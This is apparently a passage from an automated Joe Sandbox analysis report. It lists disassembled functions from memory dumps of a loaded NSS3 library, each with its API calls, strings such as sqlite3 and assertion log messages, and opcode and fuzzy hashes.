                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                                          • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                                          • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                                          • Opcode ID: 7de3ab6ba7f66e3de82728912e1c8f66759eb44af5d62c986c1686c5b31d8252
                                                                                                                                                                                                                                                                                          • Instruction ID: b011f582bd449f8109de13847c8ee301e58f3e397a81749b97e4393b4ff550aa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7de3ab6ba7f66e3de82728912e1c8f66759eb44af5d62c986c1686c5b31d8252
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB2148B5B046018BCB40AF78C68965ABBF0BF59318F158A7AD8988B701EB34D845CB91
                                                                                                                                                                                                                                                                                          Function 6C72ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C72ACE6
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C72AD14
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C72AD23
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C72AD39
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                                                                                                                                          • API String ID: 332880674-3521875567
                                                                                                                                                                                                                                                                                          • Opcode ID: 7c885b9ec5273a8d3a84986b5822a3dfef368723e84218da9fd4f97e08a2c090
                                                                                                                                                                                                                                                                                          • Instruction ID: 21512d370f62a34caff8f9c6b502d9b46f2b351f6e431947fe8b512b4bc59b97
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c885b9ec5273a8d3a84986b5822a3dfef368723e84218da9fd4f97e08a2c090
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1421F8716011449FDB609F689E8DB6B73B5AB4231EF844435E80997B12DF7CA848C6D2
                                                                                                                                                                                                                                                                                          Function 6C800ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C800EE6
                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C800EFA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C6EAF0E
                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C800F16
                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C800F1C
                                                                                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C800F25
                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C800F2B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                          • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                                                                                          • Opcode ID: f1be8f8ebe99dcfb817ff46c96a28ba487f468344a6f0e30a93c0185429b9ec8
                                                                                                                                                                                                                                                                                          • Instruction ID: 9ba05ac435ee1e6a91e7b27b53b3a0152fe12c8934a498129c8621707bb51bd8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1be8f8ebe99dcfb817ff46c96a28ba487f468344a6f0e30a93c0185429b9ec8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D01ADB5A00114ABDF21AFA4DC4589B3F7CEF4626CF008465FD0987642D731ED14DAE2
                                                                                                                                                                                                                                                                                          Function 6C7E1C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=nl,?,?,6C6E4E1D), ref: 6C7E1C8A
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C7E1CB6
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                                                                                          • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=nl
                                                                                                                                                                                                                                                                                          • API String ID: 1840970956-282555700
                                                                                                                                                                                                                                                                                          • Opcode ID: 6eb7a4ade660ace389b49b534401be837fa155e6c65fde46ec6718be6216da05
                                                                                                                                                                                                                                                                                          • Instruction ID: 83add3f3561b8736f496cc84f6946898fb9757417b982dbf70822ffa35c46a01
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eb7a4ade660ace389b49b534401be837fa155e6c65fde46ec6718be6216da05
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 540124B1A001005BD720AB28D8029B177E5EF8634CB55487DED44CBB53EB26E89AC795
                                                                                                                                                                                                                                                                                          Function 6C7C4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7C4DC3
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7C4DE0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C7C4DB8
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C7C4DDA
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7C4DCB
                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C7C4DBD
                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C7C4DD5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                          • Opcode ID: 3f6eb47cfb9481f8f6bf7fdb390fb271999b7bd3682d4d0fec950c7fdaf9230b
                                                                                                                                                                                                                                                                                          • Instruction ID: c98be43e721ba39765747b5a61f2998b5ddc09d40c31ad5016f9e235465172cd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f6eb47cfb9481f8f6bf7fdb390fb271999b7bd3682d4d0fec950c7fdaf9230b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF02422F045692FD7106054CF16FA337554F0231AF160DB0EF086BB92D20A9880A2D6
                                                                                                                                                                                                                                                                                          Function 6C7C4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7C4E30
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7C4E4D
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C7C4E25
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C7C4E47
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7C4E38
                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C7C4E2A
                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C7C4E42
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                          • Opcode ID: f224ecef6b9231f2fd8fe480f76fe1822529b0c35d722d449a1c08a82a71498e
                                                                                                                                                                                                                                                                                          • Instruction ID: a7023e084666787e0421c680c17c5a24ae24ba3e52a6234350473c259ecd3f9f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f224ecef6b9231f2fd8fe480f76fe1822529b0c35d722d449a1c08a82a71498e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1F0E911F445292FD72010659F14FA33BAD4B02319F1A48F1EA0867FA3D20998A162E6
                                                                                                                                                                                                                                                                                          Function 6C6F9FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6FA086
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C6FA09B
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6FA0B7
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6FA0E9
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6FA11B
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C6FA12F
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6FA148
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C711A40: PR_Now.NSS3(?,00000000,6C6F28AD,00000000,?,6C70F09A,00000000,6C6F28AD,6C6F93B0,?,6C6F93B0,6C6F28AD,00000000,?,00000000), ref: 6C711A65
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C711940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C714126,?), ref: 6C711966
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6FA1A3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3953697463-0
                                                                                                                                                                                                                                                                                          • Opcode ID: df54aaa173bd874975c4568d424a12001f5bb07f73e4323eaa483facac860604
                                                                                                                                                                                                                                                                                          • Instruction ID: 9c431446a42e24c4e6c2a814433c4d1ef658243e82fa97b3daa0b7bac19f5d7a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df54aaa173bd874975c4568d424a12001f5bb07f73e4323eaa483facac860604
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3151B8B1A002009BEB109F69DD48AAB77BAEF8634CB15453DDC3997702EF31E846C695
                                                                                                                                                                                                                                                                                          Function 6C730C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,6C731444,?,00000001,?,00000000,00000000,?,?,6C731444,?,?,00000000,?,?), ref: 6C730CB3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C731444,?,00000001,?,00000000,00000000,?,?,6C731444,?), ref: 6C730DC1
                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C731444,?,00000001,?,00000000,00000000,?,?,6C731444,?), ref: 6C730DEC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C6F2AF5,?,?,?,?,?,6C6F0A1B,00000000), ref: 6C750F1A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750F10: malloc.MOZGLUE(00000001), ref: 6C750F30
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C750F42
                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C731444,?,00000001,?,00000000,00000000,?), ref: 6C730DFF
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C731444,?,00000001,?,00000000), ref: 6C730E16
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C731444,?,00000001,?,00000000,00000000,?), ref: 6C730E53
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C731444,?,00000001,?,00000000,00000000,?,?,6C731444,?,?,00000000), ref: 6C730E65
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C731444,?,00000001,?,00000000,00000000,?), ref: 6C730E79
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C741560: TlsGetValue.KERNEL32(00000000,?,6C710844,?), ref: 6C74157A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C741560: EnterCriticalSection.KERNEL32(?,?,?,6C710844,?), ref: 6C74158F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C741560: PR_Unlock.NSS3(?,?,?,?,6C710844,?), ref: 6C7415B2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C711397,00000000,?,6C70CF93,5B5F5EC0,00000000,?,6C711397,?), ref: 6C70B1CB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70B1A0: free.MOZGLUE(5B5F5EC0,?,6C70CF93,5B5F5EC0,00000000,?,6C711397,?), ref: 6C70B1D2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7089E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7088AE,-00000008), ref: 6C708A04
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7089E0: EnterCriticalSection.KERNEL32(?), ref: 6C708A15
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7089E0: memset.VCRUNTIME140(6C7088AE,00000000,00000132), ref: 6C708A27
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7089E0: PR_Unlock.NSS3(?), ref: 6C708A35
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 75a0f71447020d10d91b452adf36d4dd0cb36be1af55cabe83ac1fbbe427bc62
                                                                                                                                                                                                                                                                                          • Instruction ID: 6c07738074fedd207c33e88620dd4bd5dd4db606248cbc7742e461000247a887
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75a0f71447020d10d91b452adf36d4dd0cb36be1af55cabe83ac1fbbe427bc62
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7351CAF5E002105FEB019F64DE89AAB37A89F1521CF591034EC199BB53FB31ED1487A2
                                                                                                                                                                                                                                                                                          Function 6C6E6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C6E6ED8
                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C6E6EE5
                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C6E6FA8
                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?), ref: 6C6E6FDB
                                                                                                                                                                                                                                                                                          • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C6E6FF0
                                                                                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C6E7010
                                                                                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C6E701D
                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C6E7052
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
